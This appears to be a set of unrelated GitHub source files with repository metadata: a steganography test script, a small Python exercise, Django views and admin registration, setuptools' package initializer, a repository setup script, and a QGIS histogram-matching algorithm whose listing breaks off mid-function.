1576e37fbebbe3a657de3c680f4091835cf9f3b4 | b82d3d0adda51667d8a87ff8a85d0a246777f7db | /scripts/googlebooks/bindb/test_bindb_ac_encoding.py | b125fcbdfd07726d5876338e828dd6f08eb218df | [] | no_license | kkom/steganography | 2da3352fd92f4cece89d2a7034a068aa292c97ba | fb0981dc8f1aa7367801043aefc422921bb46d8b | refs/heads/master | 2020-12-05T00:51:25.873394 | 2014-06-01T23:16:22 | 2014-06-01T23:16:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,600 | py | #!/usr/bin/env python3
from pysteg.coding.rational_ac import encode
from pysteg.googlebooks import bindb
from pysteg.googlebooks.ngrams_analysis import normalise_and_explode_tokens
from pysteg.googlebooks.ngrams_analysis import text2token_strings
# Set language model parameters
n = 5
start = 322578
end = 322577
beta = 1
gamma = 0.1
offset = 0
print("n: {n}".format(**locals()))
print("start: {start}".format(**locals()))
print("end: {end}".format(**locals()))
print("beta: {beta}".format(**locals()))
print("gamma: {gamma}".format(**locals()))
print("offset: {offset}".format(**locals()))
print()
# Load language model
lm = bindb.BinDBLM("/Users/kkom/Desktop/bindb-normalised/counts-consistent-tables", n, start, end, beta, gamma, offset)
# Load index
with open("/Users/kkom/Desktop/bindb-normalised/index", "r") as f:
index = bindb.BinDBIndex(f)
# Create the sentence
text = """At the Primorsky polling station in Mariupol, a large crowd is
gathered outside, waiting to vote. There is a crush of people inside.
Organisation is chaotic at best. There are no polling booths: people vote at
the registration desks. People's details are hastily scribbled on generic
forms. There is also a collection for money towards funding the Donetsk
People's Republic."""
token_strings = normalise_and_explode_tokens(text2token_strings(text))
token_indices = tuple(map(index.s2i, token_strings))
print(text)
print()
print(" ".join(token_strings))
print()
print(token_indices)
print()
interval = encode(lm.conditional_interval, token_indices, verbose=True)
print("Decoded to: " + str(interval))
| [
"5056119+kkom@users.noreply.github.com"
] | 5056119+kkom@users.noreply.github.com |
355bad883e1856a58efb8f5443bb7e97796d4067 | baf5d1e7b8cd8fda0d3cc6f7114c5fa3bd3bc090 | /4.4.py | b1f77d6c0738c76bb9c42116b90fce573199298f | [] | no_license | joc44/PtyhonPractice | 6b13d791cb3265cebdbc9f11cb2252837ff1067e | 81302d40741bd5fa00fe238f5adc7e12554cdafa | refs/heads/main | 2023-02-23T06:28:13.075327 | 2021-01-25T20:30:18 | 2021-01-25T20:30:18 | 332,872,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 223 | py | #Írjon egy programot, ami kiír egy 12 számból álló sorozatot, aminek minden tagja vagy
#egyenlő az előző taggal, vagy annak háromszorosa
a = 1
b = 1
while b < 13:
print(a)
a = a * 3
b += 1
| [
"noreply@github.com"
] | noreply@github.com |
3de69451167cf6131f831c5e279f59ff0f2bb404 | 0b460481c25f884abdaa1d1b54e513169b19c4b0 | /user/views.py | 8d350274285948617d361a11234d205a3960eb68 | [] | no_license | mubasharehsan/reservation_task | 3540d121090c9be8564825b0cd12599bbbf6b2ac | 51df08c662b969d68eb2d3c2fe8ef5da78351cf3 | refs/heads/master | 2022-05-06T08:42:12.725775 | 2020-05-19T07:48:39 | 2020-05-19T07:48:39 | 156,724,899 | 0 | 0 | null | 2022-04-22T21:00:41 | 2018-11-08T15:09:09 | Python | UTF-8 | Python | false | false | 988 | py | from rest_framework.generics import CreateAPIView, RetrieveUpdateAPIView, ListAPIView
from rest_framework.permissions import IsAuthenticated, AllowAny
from .permissions import StaffPermission, NotLoggedIn
from .serializers import ProfileSerializer, UserRegisterSerializer
from .models import Profile
class ProfileView(RetrieveUpdateAPIView):
"""
This viewset provides `profile-data` and allows to `update` it.
"""
serializer_class = ProfileSerializer
permission_classes = (IsAuthenticated,)
def get_object(self):
return self.request.user.profile
class RegisterApiView(CreateAPIView):
"""
This viewset register new user
"""
serializer_class = UserRegisterSerializer
permission_classes = (AllowAny, NotLoggedIn)
class UserListApiView(ListAPIView):
"""
List all users if admin
"""
serializer_class = ProfileSerializer
queryset = Profile.objects.all()
permission_classes = (IsAuthenticated, StaffPermission)
| [
"noreply@github.com"
] | noreply@github.com |
4ab479c270e0bbf4c306512a937ec81e262f746d | cb00fe13083728c540076600e41710081b7ef0ce | /site/venv/Lib/site-packages/setuptools/__init__.py | 1258043a1b3d8fa9c3586104a43f761e58c9972d | [] | no_license | Wamadahama/ner-framework | 069464342512bab9f429b11be735f6cb487afb74 | 4cb699469ec8733f74cb67f67af995e734231974 | refs/heads/master | 2023-03-28T14:28:42.791453 | 2021-03-29T22:27:33 | 2021-03-29T22:27:33 | 209,624,138 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,272 | py | """Extensions to the 'distutils' for large or complex distributions"""
import os
import functools
import distutils.core
import distutils.filelist
import re
from distutils.errors import DistutilsOptionError
from distutils.util import convert_path
from fnmatch import fnmatchcase
from ._deprecation_warning import SetuptoolsDeprecationWarning
from setuptools.extern.six import PY3, string_types
from setuptools.extern.six.moves import filter, map
import setuptools.version
from setuptools.extension import Extension
from setuptools.dist import Distribution, Feature
from setuptools.depends import Require
from . import monkey
__metaclass__ = type
__all__ = [
'setup', 'Distribution', 'Feature', 'Command', 'Extension', 'Require',
'SetuptoolsDeprecationWarning',
'find_packages'
]
if PY3:
__all__.append('find_namespace_packages')
__version__ = setuptools.version.__version__
bootstrap_install_from = None
# If we run 2to3 on .py files, should we also convert docstrings?
# Default: yes; assume that we can detect doctests reliably
run_2to3_on_doctests = True
# Standard package names for fixer packages
lib2to3_fixer_packages = ['lib2to3.fixes']
class PackageFinder:
"""
Generate a list of all Python packages found within a directory
"""
@classmethod
def find(cls, where='.', exclude=(), include=('*',)):
"""Return a list all Python packages found within directory 'where'
'where' is the root directory which will be searched for packages. It
should be supplied as a "cross-platform" (i.e. URL-style) path; it will
be converted to the appropriate local path syntax.
'exclude' is a sequence of package names to exclude; '*' can be used
as a wildcard in the names, such that 'foo.*' will exclude all
subpackages of 'foo' (but not 'foo' itself).
'include' is a sequence of package names to include. If it's
specified, only the named packages will be included. If it's not
specified, all found packages will be included. 'include' can contain
shell style wildcard patterns just like 'exclude'.
"""
return list(cls._find_packages_iter(
convert_path(where),
cls._build_filter('ez_setup', '*__pycache__', *exclude),
cls._build_filter(*include)))
@classmethod
def _find_packages_iter(cls, where, exclude, include):
"""
All the packages found in 'where' that pass the 'include' filter, but
not the 'exclude' filter.
"""
for root, dirs, files in os.walk(where, followlinks=True):
# Copy dirs to iterate over it, then empty dirs.
all_dirs = dirs[:]
dirs[:] = []
for dir in all_dirs:
full_path = os.path.join(root, dir)
rel_path = os.path.relpath(full_path, where)
package = rel_path.replace(os.path.sep, '.')
# Skip directory trees that are not valid packages
if ('.' in dir or not cls._looks_like_package(full_path)):
continue
# Should this package be included?
if include(package) and not exclude(package):
yield package
# Keep searching subdirectories, as there may be more packages
# down there, even if the parent was excluded.
dirs.append(dir)
@staticmethod
def _looks_like_package(path):
"""Does a directory look like a package?"""
return os.path.isfile(os.path.join(path, '__init__.py'))
@staticmethod
def _build_filter(*patterns):
"""
Given a list of patterns, return a callable that will be true only if
the input matches at least one of the patterns.
"""
return lambda name: any(fnmatchcase(name, pat=pat) for pat in patterns)
class PEP420PackageFinder(PackageFinder):
@staticmethod
def _looks_like_package(path):
return True
find_packages = PackageFinder.find
if PY3:
find_namespace_packages = PEP420PackageFinder.find
def _install_setup_requires(attrs):
# Note: do not use `setuptools.Distribution` directly, as
# our PEP 517 backend patch `distutils.core.Distribution`.
dist = distutils.core.Distribution(dict(
(k, v) for k, v in attrs.items()
if k in ('dependency_links', 'setup_requires')
))
# Honor setup.cfg's options.
dist.parse_config_files(ignore_option_errors=True)
if dist.setup_requires:
dist.fetch_build_eggs(dist.setup_requires)
def setup(**attrs):
# Make sure we have any requirements needed to interpret 'attrs'.
_install_setup_requires(attrs)
return distutils.core.setup(**attrs)
setup.__doc__ = distutils.core.setup.__doc__
_Command = monkey.get_unpatched(distutils.core.Command)
class Command(_Command):
__doc__ = _Command.__doc__
command_consumes_arguments = False
def __init__(self, dist, **kw):
"""
Construct the command for dist, updating
vars(self) with any keyword parameters.
"""
_Command.__init__(self, dist)
vars(self).update(kw)
def _ensure_stringlike(self, option, what, default=None):
val = getattr(self, option)
if val is None:
setattr(self, option, default)
return default
elif not isinstance(val, string_types):
raise DistutilsOptionError("'%s' must be a %s (got `%s`)"
% (option, what, val))
return val
def ensure_string_list(self, option):
r"""Ensure that 'option' is a list of strings. If 'option' is
currently a string, we split it either on /,\s*/ or /\s+/, so
"foo bar baz", "foo,bar,baz", and "foo, bar baz" all become
["foo", "bar", "baz"].
"""
val = getattr(self, option)
if val is None:
return
elif isinstance(val, string_types):
setattr(self, option, re.split(r',\s*|\s+', val))
else:
if isinstance(val, list):
ok = all(isinstance(v, string_types) for v in val)
else:
ok = False
if not ok:
raise DistutilsOptionError(
"'%s' must be a list of strings (got %r)"
% (option, val))
def reinitialize_command(self, command, reinit_subcommands=0, **kw):
cmd = _Command.reinitialize_command(self, command, reinit_subcommands)
vars(cmd).update(kw)
return cmd
def _find_all_simple(path):
"""
Find all files under 'path'
"""
results = (
os.path.join(base, file)
for base, dirs, files in os.walk(path, followlinks=True)
for file in files
)
return filter(os.path.isfile, results)
def findall(dir=os.curdir):
"""
Find all files under 'dir' and return the list of full filenames.
Unless dir is '.', return full filenames with dir prepended.
"""
files = _find_all_simple(dir)
if dir == os.curdir:
make_rel = functools.partial(os.path.relpath, start=dir)
files = map(make_rel, files)
return list(files)
# Apply monkey patches
monkey.patch_all()
| [
"evanscruzen@gmail.com"
] | evanscruzen@gmail.com |
1fbe0a4108c18ccc55dfbbaa1af3c6e0af91ea16 | 12fa96a5e304ae85fd65726fee0b58bf1b4d1567 | /PlacementBuddy/Newsfeed/admin.py | 3ae5fc89b086708f148243f1ef59e42e4572ee3a | [] | no_license | ramkishor-hosamane/Placement-Buddy | eb1b16c4901fc0ee3a81f9373963910bb756ca5e | 4ed65cea3f13129143d64178cb5ea258e3a9ca81 | refs/heads/main | 2023-02-03T08:45:01.564191 | 2020-12-21T19:04:17 | 2020-12-21T19:04:17 | 319,855,391 | 0 | 0 | null | 2020-12-12T13:17:17 | 2020-12-09T05:47:15 | HTML | UTF-8 | Python | false | false | 237 | py | from django.contrib import admin
from .models import Post,Comment,FavouritePost,Question
# Register your models here.
admin.site.register(Post)
admin.site.register(Comment)
admin.site.register(FavouritePost)
admin.site.register(Question) | [
"ramhosamane@gmail.com"
] | ramhosamane@gmail.com |
ee9ea4d11f545f46aa88dcf699a6500010c37f2d | c6d9e353d19e0b92da72602ce274493dbb179525 | /Setup_custom.py | ca095135168082bb68b2205c98650d75d777c9fc | [
"BSL-1.0",
"Python-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | davidbrownell/Common_cpp_Common | a337f0d589316f28950e93acd518d4e82b7cc14a | 7346273b79628514af1c584c447003a638def15d | refs/heads/master | 2022-03-01T19:31:12.571884 | 2022-01-03T17:56:37 | 2022-01-03T17:56:37 | 187,749,343 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,579 | py | # ----------------------------------------------------------------------
# |
# | Setup_custom.py
# |
# | David Brownell <db@DavidBrownell.com>
# | 2018-05-03 22:12:13
# |
# ----------------------------------------------------------------------
# |
# | Copyright David Brownell 2018-22.
# | Distributed under the Boost Software License, Version 1.0.
# | (See accompanying file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
# |
# ----------------------------------------------------------------------
"""Performs repository-specific setup activities."""
# ----------------------------------------------------------------------
# |
# | To setup an environment, run:
# |
# | Setup(.cmd|.ps1|.sh) [/debug] [/verbose] [/configuration=<config_name>]*
# |
# ----------------------------------------------------------------------
import os
import shutil
import sys
from collections import OrderedDict
import CommonEnvironment
# ----------------------------------------------------------------------
_script_fullpath = CommonEnvironment.ThisFullpath()
_script_dir, _script_name = os.path.split(_script_fullpath)
# ----------------------------------------------------------------------
# <Missing function docstring> pylint: disable = C0111
# <Line too long> pylint: disable = C0301
# <Wrong hanging indentation> pylint: disable = C0330
# <Class '<name>' has no '<attr>' member> pylint: disable = E1103
# <Unreachable code> pylint: disable = W0101
# <Wildcard import> pylint: disable = W0401
# <Unused argument> pylint: disable = W0613
fundamental_repo = os.getenv("DEVELOPMENT_ENVIRONMENT_FUNDAMENTAL")
assert os.path.isdir(fundamental_repo), fundamental_repo
sys.path.insert(0, fundamental_repo)
from RepositoryBootstrap import * # <Unused import> pylint: disable = W0614
from RepositoryBootstrap.SetupAndActivate import CurrentShell # <Unused import> pylint: disable = W0614
from RepositoryBootstrap.SetupAndActivate.Configuration import * # <Unused import> pylint: disable = W0614
del sys.path[0]
from _custom_data import _CUSTOM_DATA
# ----------------------------------------------------------------------
# There are two types of repositories: Standard and Mixin. Only one standard
# repository may be activated within an environment at a time while any number
# of mixin repositories can be activated within a standard repository environment.
# Standard repositories may be dependent on other repositories (thereby inheriting
# their functionality), support multiple configurations, and specify version
# information for tools and libraries in themselves or its dependencies.
#
# Mixin repositories are designed to augment other repositories. They cannot
# have configurations or dependencies and may not be activated on their own.
#
# These difference are summarized in this table:
#
# Standard Mixin
# -------- -----
# Can be activated in isolation X
# Supports configurations X
# Supports VersionSpecs X
# Can be dependent upon other repositories X
# Can be activated within any other Standard X
# repository
#
# Consider a script that wraps common Git commands. This functionality is useful
# across a number of different repositories, yet doesn't have functionality that
# is useful on its own; it provides functionality that augments other repositories.
# This functionality should be included within a repository that is classified
# as a mixin repository.
#
# To classify a repository as a Mixin repository, decorate the GetDependencies method
# with the MixinRepository decorator.
#
# @MixinRepository # <-- Uncomment this line to classify this repository as a mixin repository
def GetDependencies():
"""
Returns information about the dependencies required by this repository.
The return value should be an OrderedDict if the repository supports multiple configurations
(aka is configurable) or a single Configuration if not.
"""
d = OrderedDict()
if CurrentShell.CategoryName == "Windows":
architectures = ["x64", "x86"]
else:
# Cross compiling on Linux is much more difficult on Linux than it is on
# Windows. Only support the current architecture.
architectures = [CurrentShell.Architecture]
for architecture in architectures:
d[architecture] = Configuration(
architecture,
[
Dependency(
"0EAA1DCF22804F90AD9F5A3B85A5D706",
"Common_Environment",
"python36",
"https://github.com/davidbrownell/Common_Environment_v3.git",
)
],
)
return d
# ----------------------------------------------------------------------
def GetCustomActions(debug, verbose, explicit_configurations):
"""
Returns an action or list of actions that should be invoked as part of the setup process.
Actions are generic command line statements defined in
<Common_Environment>/Libraries/Python/CommonEnvironment/v1.0/CommonEnvironment/Shell/Commands/__init__.py
that are converted into statements appropriate for the current scripting language (in most
cases, this is Bash on Linux systems and Batch or PowerShell on Windows systems.
"""
actions = []
for tool, version_infos in _CUSTOM_DATA:
for version, operating_system_infos in version_infos:
for operating_system, hash in operating_system_infos:
if CurrentShell.CategoryName != operating_system:
continue
tool_dir = os.path.join(
_script_dir,
"Tools",
tool,
version,
operating_system,
)
assert os.path.isdir(tool_dir), tool_dir
actions += [
CurrentShell.Commands.Execute(
'python "{script}" Install "{tool} - {version}" "{uri}" "{dir}" "/unique_id={hash}" /unique_id_is_hash'.format(
script=os.path.join(
os.getenv("DEVELOPMENT_ENVIRONMENT_FUNDAMENTAL"),
"RepositoryBootstrap",
"SetupAndActivate",
"AcquireBinaries.py",
),
tool=tool,
version=version,
uri=CommonEnvironmentImports.FileSystem.FilenameToUri(
os.path.join(tool_dir, "Install.7z"),
),
dir=tool_dir,
hash=hash,
),
),
]
# Perform actions that must be completed after all other actions have completed
actions.append(
CurrentShell.Commands.Execute(
'python "{}"'.format(os.path.join(_script_dir, "Setup_epilogue.py")),
),
)
return actions
| [
"db@DavidBrownell.com"
] | db@DavidBrownell.com |
6bb17ba7ec485b1287ac16c15187bb1d7a62ed84 | 70fc02e04892bc099e48f75ccbe339feb1317c0c | /HistogramMatching.py | b582fa97fc89e911cc7c3b94b0823d940bc771f1 | [] | no_license | yougis/geoscript | e1a329763396fbebb674eea2c08fe06d1034e17c | f42ad416703af85f203662ba31724158cd888e11 | refs/heads/master | 2021-06-03T05:02:10.788966 | 2021-04-22T23:25:28 | 2021-04-22T23:25:28 | 38,092,844 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,235 | py | # -*- coding: utf-8 -*-
"""
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from qgis.PyQt.QtCore import QCoreApplication
from qgis.core import (QgsProcessing,
QgsFeatureSink,
QgsRectangle,
QgsRasterLayer,
QgsProcessingException,
QgsProcessingAlgorithm,
QgsProcessingParameterNumber,
QgsProcessingParameterRasterLayer,
QgsProcessingParameterFeatureSource,
QgsProcessingParameterFileDestination,
QgsProcessingOutputBoolean)
from qgis import processing
from osgeo import gdal, osr
import numpy as np
import os
class HistogramMatching(QgsProcessingAlgorithm):
INPUT = 'INPUT'
REFERENCE = 'REFERENCE'
MASK = 'MASK'
DESATURATION = 'DESATURATION'
SATURATION = 'SATURATION'
DECOUPE = 'DECOUPE'
OUTPUT = 'OUTPUT'
def tr(self, string):
return QCoreApplication.translate('Processing', string)
def createInstance(self):
return HistogramMatching()
def name(self):
return 'histogramMatching'
def displayName(self):
return self.tr('Histogram Matching')
def group(self):
return self.tr('Satellite')
def groupId(self):
return 'satellite'
def shortHelpString(self):
return self.tr("Algorithme permantant une égalisation colorimétrique par rapport à une image de référence basé sur un 'Histogram Matching'")
def initAlgorithm(self, config=None):
self.addParameter(
QgsProcessingParameterRasterLayer(
self.INPUT,
self.tr('Couche en entrée')
)
)
self.addParameter(
QgsProcessingParameterRasterLayer(
self.REFERENCE,
self.tr('Couche de référence')
)
)
self.addParameter(
QgsProcessingParameterFeatureSource(
self.MASK,
self.tr('Zone de travail')
)
)
self.addParameter(
QgsProcessingParameterNumber(
self.DESATURATION,
self.tr('Poucentage de désaturation'),
defaultValue = 1,
minValue = 0,
maxValue = 100
)
)
self.addParameter(
QgsProcessingParameterNumber(
self.SATURATION,
self.tr('Poucentage de saturation'),
type=QgsProcessingParameterNumber.Double,
defaultValue = 0,
minValue = 0,
maxValue = 100
)
)
self.addParameter(
QgsProcessingParameterFeatureSource(
self.DECOUPE,
self.tr('Zone de découpe finale'),
optional=True
)
)
self.addParameter(
QgsProcessingParameterFileDestination(
self.OUTPUT,
self.tr('VRT final'),
'VRT files (*.vrt)'
)
)
self.addOutput(
QgsProcessingOutputBoolean(
'SUCCESS',
self.tr('Success')
)
)
def generateClippedInput(self, parameters, context, feedback):
feedback.pushInfo("......Application du mask vecteur sur l'image d'entrée")
clip_result = processing.run(
'gdal:cliprasterbymasklayer',
{
'INPUT': parameters['INPUT'],
'MASK' : parameters['MASK'],
'NODATA' : 0,
'ALPHA_BAND' : True,
'OUTPUT': 'TEMPORARY_OUTPUT'
},
is_child_algorithm=True,
context=context,
feedback=feedback)
return QgsRasterLayer(clip_result['OUTPUT'])
def generateClippedReference(self, parameters, context, feedback):
feedback.pushInfo("......Application du mask vecteur sur l'image de référence")
clip_result = processing.run(
'gdal:cliprasterbymasklayer',
{
'INPUT': parameters['REFERENCE'],
'MASK' : parameters['MASK'],
'ALPHA_BAND' : True,
'NODATA' : 0,
'OUTPUT': 'TEMPORARY_OUTPUT'
},
is_child_algorithm=True,
context=context,
feedback=feedback)
return QgsRasterLayer(clip_result['OUTPUT'])
def generateFinalClip(self, parameters, context, feedback):
feedback.pushInfo("......Application du mask final sur l'image d'entrée")
clip_result = processing.run(
'gdal:cliprasterbymasklayer',
{
'INPUT': parameters['INPUT'],
'MASK' : parameters['DECOUPE'],
'ALPHA_BAND' : True,
'NODATA' : 0,
'OUTPUT': 'TEMPORARY_OUTPUT'
},
is_child_algorithm=True,
context=context,
feedback=feedback)
return QgsRasterLayer(clip_result['OUTPUT'])
def generateTravailMask(self, parameters, context, feedback):
feedback.pushInfo("......Création du mask de travail")
mask_result = processing.run(
'gdal:rasterize',
{
'INPUT': parameters['MASK'],
'BURN' : 255,
'NODATA': 0,
'EXTENT': parameters['MASK'],
'UNITS' : 1,
'WIDTH' : 0.5,
'HEIGHT' : 0.5,
'DATA_TYPE' : 0,
'OUTPUT': 'TEMPORARY_OUTPUT'
},
is_child_algorithm=True,
context=context,
feedback=feedback)
return QgsRasterLayer(mask_result['OUTPUT'])
def generateFinalMask(self, parameters, context, feedback):
feedback.pushInfo("......Création du mask final")
mask_result = processing.run(
'gdal:rasterize',
{
'INPUT': parameters['DECOUPE'],
'BURN' : 255,
'NODATA': 0,
'EXTENT': parameters['DECOUPE'],
'UNITS' : 1,
'WIDTH' : 0.5,
'HEIGHT' : 0.5,
'DATA_TYPE' : 0,
'OUTPUT': 'TEMPORARY_OUTPUT'
},
is_child_algorithm=True,
context=context,
feedback=feedback)
return QgsRasterLayer(mask_result['OUTPUT'])
def getDesaturationTuple(self,band,ref_provider,match_provider,ref_cumulhist, match_cumulhist, pourcent_desaturation,pourcent_saturation) :
max_ref = len(ref_cumulhist)
max_match = 0
for i in match_cumulhist :
if i < match_cumulhist[-1]-(match_cumulhist[-1]*pourcent_saturation/100) :
max_match+=1
else :
break
min_ref = int(max_ref-(max_ref*pourcent_desaturation/100))
min_match = 0
for i in match_cumulhist :
if (i/match_cumulhist[-1]) < (ref_cumulhist[min_ref]/ref_cumulhist[-1]) :
min_match+=1
else :
break
pas_match = (max_match - min_match)/pourcent_desaturation
pas_ref = (max_ref - min_ref)/pourcent_desaturation
return (min_ref, min_match, pas_match, pas_ref)
def getRefValue(self,indice, match_cumulhist,ref_cumulhist, desaturation) :
(min_ref, min_match, pas_match, pas_ref) = desaturation
value = 0
for i in ref_cumulhist :
if (i/ref_cumulhist[-1]) < (match_cumulhist[indice]/match_cumulhist[-1]) and (value < min_ref) :
value+=1
else :
break
if value == min_ref :
nbPas = (indice-min_match)/pas_match
value = int(min_ref + nbPas*pas_ref)
return value
def generateVRT(self,liste_vrt,parameters,context,feedback) :
vrt_result = processing.run(
'gdal:buildvirtualraster',
{
'INPUT': liste_vrt,
'RESOLUTION': 1,
'SEPARATE': False,
'OUTPUT': parameters['OUTPUT']
},
is_child_algorithm=True,
context=context,
feedback=feedback)
return QgsRasterLayer(vrt_result['OUTPUT'])
def generateOverview(self,parameters,context,feedback) :
processing.run(
'gdal:overviews',
{
'INPUT': parameters['OUTPUT'],
'LEVELS': '2 4 8 16 32 64 128',
'RESAMPLING': 1,
'FORMAT': 1,
'OUTPUT': 'TEMPORARY_OUTPUT'
},
is_child_algorithm=True,
context=context,
feedback=feedback)
def processAlgorithm(self, parameters, context, feedback):
source = self.parameterAsRasterLayer(
parameters,
self.INPUT,
context
)
reference = self.parameterAsRasterLayer(
parameters,
self.REFERENCE,
context
)
pourcent_desaturation = self.parameterAsInt(
parameters,
self.DESATURATION,
context
)
pourcent_saturation = self.parameterAsDouble(
parameters,
self.SATURATION,
context
)
if source is None:
raise QgsProcessingException(self.invalidSourceError(parameters, self.INPUT))
if reference is None:
raise QgsProcessingException(self.invalidSourceError(parameters, self.REFERENCE))
feedback.setProgress(1)
feedback.pushInfo('Début clip des images')
clip_source = self.generateClippedInput(parameters,context,feedback)
feedback.setProgress(5)
if feedback.isCanceled():
return {'SUCCESS': False}
clip_reference = self.generateClippedReference(parameters,context,feedback)
feedback.pushInfo('Fin clip des images')
match_provider = clip_source.dataProvider()
ref_provider = clip_reference.dataProvider()
feedback.setProgress(10)
if feedback.isCanceled():
return {'SUCCESS': False}
feedback.pushInfo('Calcul Histo bande rouge')
ref_histo = ref_provider.histogram(1,0)
match_histo = match_provider.histogram(1,0)
if len(match_histo.histogramVector) == 0 :
feedback.reportError("Impossible de calculer l'histogramme",True)
return {'SUCCESS': False}
ref_cumulhist_red = [sum(ref_histo.histogramVector[:x+1]) for x in range(len(ref_histo.histogramVector))]
match_cumulhist_red = [sum(match_histo.histogramVector[:x+1]) for x in range(len(match_histo.histogramVector))]
desaturation_red = self.getDesaturationTuple(1,ref_provider,match_provider,ref_cumulhist_red, match_cumulhist_red, pourcent_desaturation,pourcent_saturation)
transformation_table_red = [self.getRefValue(x,match_cumulhist_red,ref_cumulhist_red,desaturation_red) for x in range(len(match_cumulhist_red))]
feedback.setProgress(20)
if feedback.isCanceled():
return {'SUCCESS': False}
feedback.pushInfo('Calcul Histo bande verte')
ref_histo = ref_provider.histogram(2,0)
match_histo = match_provider.histogram(2,0)
ref_cumulhist_green = [sum(ref_histo.histogramVector[:x+1]) for x in range(len(ref_histo.histogramVector))]
match_cumulhist_green = [sum(match_histo.histogramVector[:x+1]) for x in range(len(match_histo.histogramVector))]
desaturation_green = self.getDesaturationTuple(1,ref_provider,match_provider,ref_cumulhist_green, match_cumulhist_green, pourcent_desaturation,pourcent_saturation)
transformation_table_green = [self.getRefValue(x,match_cumulhist_green,ref_cumulhist_green,desaturation_green) for x in range(len(match_cumulhist_green))]
feedback.setProgress(30)
if feedback.isCanceled():
return {'SUCCESS': False}
feedback.pushInfo('Calcul Histo bande bleue')
ref_histo = ref_provider.histogram(3,0)
match_histo = match_provider.histogram(3,0)
ref_cumulhist_blue = [sum(ref_histo.histogramVector[:x+1]) for x in range(len(ref_histo.histogramVector))]
match_cumulhist_blue = [sum(match_histo.histogramVector[:x+1]) for x in range(len(match_histo.histogramVector))]
desaturation_blue = self.getDesaturationTuple(1,ref_provider,match_provider,ref_cumulhist_blue, match_cumulhist_blue, pourcent_desaturation,pourcent_saturation)
transformation_table_blue = [self.getRefValue(x,match_cumulhist_blue,ref_cumulhist_blue,desaturation_blue) for x in range(len(match_cumulhist_blue))]
feedback.setProgress(40)
feedback.pushInfo('Création du Raster 8 bits')
liste_vrt=[]
mask_travail = self.parameterAsVectorLayer(
parameters,
self.MASK,
context
)
mask_final = self.parameterAsVectorLayer(
parameters,
self.DECOUPE,
context
)
masked = True
if mask_final is None:
mask_raster = None
masked = False
elif mask_final == mask_travail :
mask_raster = self.generateTravailMask(parameters,context,feedback)
else :
mask_raster = self.generateFinalMask(parameters,context,feedback)
feedback.setProgress(50)
if feedback.isCanceled():
return {'SUCCESS': False}
final_provider = source.dataProvider()
if masked:
mask_provider = mask_raster.dataProvider()
origin_extent = mask_provider.extent()
else :
origin_extent = final_provider.extent()
if int(str(int(origin_extent.xMinimum()))[2:]) < 5000 :
fe_xmin = int(origin_extent.xMinimum()/10000)*10000
else :
fe_xmin = (int(origin_extent.xMinimum()/10000)*10000) + 5000
if int(str(int(origin_extent.yMinimum()))[2:]) < 5000 :
fe_ymin = int(origin_extent.yMinimum()/10000)*10000
else :
fe_ymin = (int(origin_extent.yMinimum()/10000)*10000) + 5000
if int(str(int(origin_extent.xMaximum()))[2:]) == 0 :
fe_xmax = origin_extent.xMaximum()
elif int(str(int(origin_extent.xMaximum()))[2:]) <= 5000 :
fe_xmax = (int(origin_extent.xMaximum()/10000)*10000) + 5000
else :
fe_xmax = (int(origin_extent.xMaximum()/10000)*10000) + 10000
if int(str(int(origin_extent.yMaximum()))[2:]) == 0 :
fe_ymax = origin_extent.yMaximum()
elif int(str(int(origin_extent.yMaximum()))[2:]) <= 5000 :
fe_ymax = (int(origin_extent.yMaximum()/10000)*10000) + 5000
else :
fe_ymax = (int(origin_extent.yMaximum()/10000)*10000) + 10000
width_dalle = int(5000 / float(source.rasterUnitsPerPixelX()))
height_dalle = int(5000 / float(source.rasterUnitsPerPixelX()))
feedback.setProgress(60)
if feedback.isCanceled():
return {'SUCCESS': False}
if not os.path.exists(self.parameterAsFileOutput(parameters, self.OUTPUT, context).split('.')[0]):
os.mkdir(self.parameterAsFileOutput(parameters, self.OUTPUT, context).split('.')[0])
feedback.pushInfo('Création des dalles 8BITS')
feedback.pushDebugInfo ('Extent finale : ('+str(fe_xmin)+','+str(fe_ymin)+','+str(fe_xmax)+','+str(fe_ymax)+')')
for i in range(int((fe_xmax-fe_xmin)/5000)) :
for j in range(int((fe_ymax-fe_ymin)/5000)) :
feedback.pushInfo('..........PSUD_SAT50_'+str(fe_xmin+i*5000)+'_'+str(fe_ymin+j*5000)+'_2019_5KM')
extent_dalle = QgsRectangle(fe_xmin+i*5000,fe_ymin+j*5000,(fe_xmin+i*5000)+5000,(fe_ymin+j*5000)+5000)
band_red = np.zeros((height_dalle,width_dalle))
block_source_red = final_provider.block(1, extent_dalle, width_dalle, height_dalle)
band_green = np.zeros((height_dalle,width_dalle))
block_source_green = final_provider.block(2, extent_dalle, width_dalle, height_dalle)
band_blue = np.zeros((height_dalle,width_dalle))
block_source_blue = final_provider.block(3, extent_dalle, width_dalle, height_dalle)
band_alpha = np.zeros((height_dalle,width_dalle))
if masked:
block_alpha = mask_provider.block(1, extent_dalle, width_dalle, height_dalle)
for x in range(height_dalle):
for y in range(width_dalle):
if (not block_source_red.isNoData(x,y)) and (masked and int(block_alpha.value(x,y)) == 255):
if int(block_source_red.value(x,y)) > len(transformation_table_red)-1 :
band_red[x,y] = int(transformation_table_red[-1])
#feedback.pushDebugInfo ('Valeur hors limites : '+str(block_source_red.value(x,y)))
else :
band_red[x,y] = int(transformation_table_red[int(block_source_red.value(x,y))])
if int(block_source_green.value(x,y)) > len(transformation_table_green)-1 :
band_green[x,y]=int(transformation_table_green[-1])
#feedback.pushDebugInfo ('Valeur hors limites : '+str(block_source_green.value(x,y)))
else :
band_green[x,y]=int(transformation_table_green[int(block_source_green.value(x,y))])
if int(block_source_blue.value(x,y)) > len(transformation_table_blue)-1 :
band_blue[x,y]=int(transformation_table_blue[-1])
#feedback.pushDebugInfo ('Valeur hors limites : '+str(block_source_blue.value(x,y)))
else :
band_blue[x,y]=int(transformation_table_blue[int(block_source_blue.value(x,y))])
band_alpha[x,y]=255
driver = gdal.GetDriverByName('GTiff')
